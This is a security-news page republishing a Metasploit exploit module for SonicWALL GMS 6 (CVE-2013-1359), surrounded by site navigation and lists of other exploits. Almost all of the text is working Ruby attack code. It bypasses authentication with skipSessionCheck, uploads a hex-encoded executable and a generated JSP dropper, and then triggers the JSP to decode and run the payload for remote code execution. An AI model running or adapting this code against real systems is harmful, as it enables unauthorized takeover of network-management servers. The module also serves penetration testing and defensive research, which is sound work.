首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SonicWALL GMS 6 Arbitrary File Upload
来源:metasploit.com 作者:vazquez 发布时间:2013-01-25  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::EXE
 include Msf::Exploit::FileDropper

 def initialize(info = {})
  super(update_info(info,
   'Name'        => 'SonicWALL GMS 6 Arbitrary File Upload',
   'Description' => %q{
     This module exploits a code execution flaw in SonicWALL GMS. It exploits two
    vulnerabilities in order to get its objective. An authentication bypass in the
    Web Administration interface allows to abuse the "appliance" application and upload
    an arbitrary payload embedded in a JSP. The module has been tested successfully on
    SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
    Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
    successfully while testing, shell payload have been used.
   },
   'Author'       =>
    [
     'Nikolas Sotiriu', # Vulnerability Discovery
     'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
     'juan vazquez' # Metasploit module
    ],
   'License'     => MSF_LICENSE,
   'References'  =>
    [
     [ 'CVE', '2013-1359'],
     [ 'OSVDB', '89347' ],
     [ 'BID', '57445' ],
     [ 'EDB', '24204' ]
    ],
   'Privileged'  => true,
   'Platform'    => [ 'win', 'linux' ],
   'Targets'     =>
    [
     [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
      {
       'Arch' => ARCH_X86,
       'Platform' => 'win'
      }
     ],
     [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
      {
       'Arch' => ARCH_X86,
       'Platform' => 'linux'
      }
     ]
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Jan 17 2012'))

  register_options(
   [
    Opt::RPORT(80),
    OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
   ], self.class)
 end


 def on_new_session
  # on_new_session will force stdapi to load (for Linux meterpreter)
 end


 def generate_jsp
  var_hexpath       = Rex::Text.rand_text_alpha(rand(8)+8)
  var_exepath       = Rex::Text.rand_text_alpha(rand(8)+8)
  var_data          = Rex::Text.rand_text_alpha(rand(8)+8)
  var_inputstream   = Rex::Text.rand_text_alpha(rand(8)+8)
  var_outputstream  = Rex::Text.rand_text_alpha(rand(8)+8)
  var_numbytes      = Rex::Text.rand_text_alpha(rand(8)+8)
  var_bytearray     = Rex::Text.rand_text_alpha(rand(8)+8)
  var_bytes         = Rex::Text.rand_text_alpha(rand(8)+8)
  var_counter       = Rex::Text.rand_text_alpha(rand(8)+8)
  var_char1         = Rex::Text.rand_text_alpha(rand(8)+8)
  var_char2         = Rex::Text.rand_text_alpha(rand(8)+8)
  var_comb          = Rex::Text.rand_text_alpha(rand(8)+8)
  var_exe           = Rex::Text.rand_text_alpha(rand(8)+8)
  @var_hexfile      = Rex::Text.rand_text_alpha(rand(8)+8)
  var_proc          = Rex::Text.rand_text_alpha(rand(8)+8)
  var_fperm         = Rex::Text.rand_text_alpha(rand(8)+8)
  var_fdel          = Rex::Text.rand_text_alpha(rand(8)+8)

  jspraw =  "<%@ page import=\"java.io.*\" %>\n"
  jspraw << "<%\n"
  jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
  jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
  jspraw << "String #{var_data} = \"\";\n"

  jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
  jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
  jspraw << "}\n"

  jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
  jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"

  jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
  jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
  jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
  jspraw << "#{var_inputstream}.close();\n"

  jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
  jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
  jspraw << "{\n"
  jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
  jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
  jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
  jspraw << "#{var_comb} <<= 4;\n"
  jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
  jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
  jspraw << "}\n"

  jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
  jspraw << "#{var_outputstream}.close();\n"

  jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
  jspraw << "String[] #{var_fperm} = new String[3];\n"
  jspraw << "#{var_fperm}[0] = \"chmod\";\n"
  jspraw << "#{var_fperm}[1] = \"+x\";\n"
  jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
  jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
  jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
  jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
  jspraw << "}\n"
  # Linux and other UNICES allow removing files while they are in use...
  jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
  jspraw << "} else {\n"
  # Windows does not ..
  jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
  jspraw << "}\n"

  jspraw << "%>\n"
  return jspraw
 end

 def get_install_path
  res = send_request_cgi(
   {
    'uri'    => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
    'method' => 'POST',
    'connection' => 'TE, close',
    'headers' =>
     {
      'TE' => "deflate,gzip;q=0.3",
     },
    'vars_post' => {
     'num' => '123456',
     'action' => 'show_diagnostics',
     'task' => 'search',
     'item' => 'application_log',
     'criteria' => '*.*',
     'width' => '500'
    }
   })

  if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
   return $1
  end

  return nil
 end

 def upload_file(location, filename, contents)
  post_data = Rex::MIME::Message.new
  post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
  post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
  post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
  post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")

  data = post_data.to_s
  data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

  res = send_request_cgi(
   {
    'uri'    => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
    'method' => 'POST',
    'data'   => data,
    'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
    'headers' =>
     {
      'TE' => "deflate,gzip;q=0.3",
     },
    'connection' => 'TE, close'
   })

  if res and res.code == 200 and res.body.empty?
   return true
  else
   return false
  end
 end

 def check
  @peer = "#{rhost}:#{rport}"
  @uri = normalize_uri(target_uri.path)
  @uri << '/' if @uri[-1,1] != '/'

  if get_install_path.nil?
   return Exploit::CheckCode::Safe
  end

  return Exploit::CheckCode::Vulnerable
 end

 def exploit
  @peer = "#{rhost}:#{rport}"
  @uri = normalize_uri(target_uri.path)
  @uri << '/' if @uri[-1,1] != '/'

  # Get Tomcat installation path
  print_status("#{@peer} - Retrieving Tomcat installation path...")
  install_path = get_install_path

  if install_path.nil?
   fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
  end

  print_good("#{@peer} - Tomcat installed on #{install_path}")

  if target['Platform'] == "linux"
   @location = "#{install_path}webapps/appliance/"
  elsif target['Platform'] == "win"
   @location = "#{install_path}webapps\\appliance\\"
  end


  # Upload the JSP and the raw payload
  @jsp_name = rand_text_alphanumeric(8+rand(8))

  jspraw = generate_jsp

  # Specify the payload in hex as an extra file..
  payload_hex = payload.encoded_exe.unpack('H*')[0]

  print_status("#{@peer} - Uploading the payload")

  if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
   print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
  else
   fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
  end

  print_status("#{@peer} - Uploading the payload")

  if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
   print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
  else
   fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
  end

  print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
  res = send_request_cgi(
   {
    'uri'    => "#{@uri}appliance/#{@jsp_name}.jsp",
    'method' => 'GET'
   })

  if res and res.code != 200
   print_warning("#{@peer} - Error triggering the payload")
  end

  register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
  register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Movable Type 4.2x, 4.3x Web Up
·Novell eDirectory 8 Buffer Ove
·ZoneMinder Video Server packag
·Barracuda Networks SSHd Backdo
·Simatic WinCC Information Harv
·KMPlayer 3.5.0.77 Denial Of Se
·Java Applet AverageRangeStatis
·Windows Manage Memory Payload
·Java Applet Method Handle Remo
·SQLiteManager 1.2.4 Remote PHP
·NVidia Display Driver Service
·Wordpress theme sandbox Arbitr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved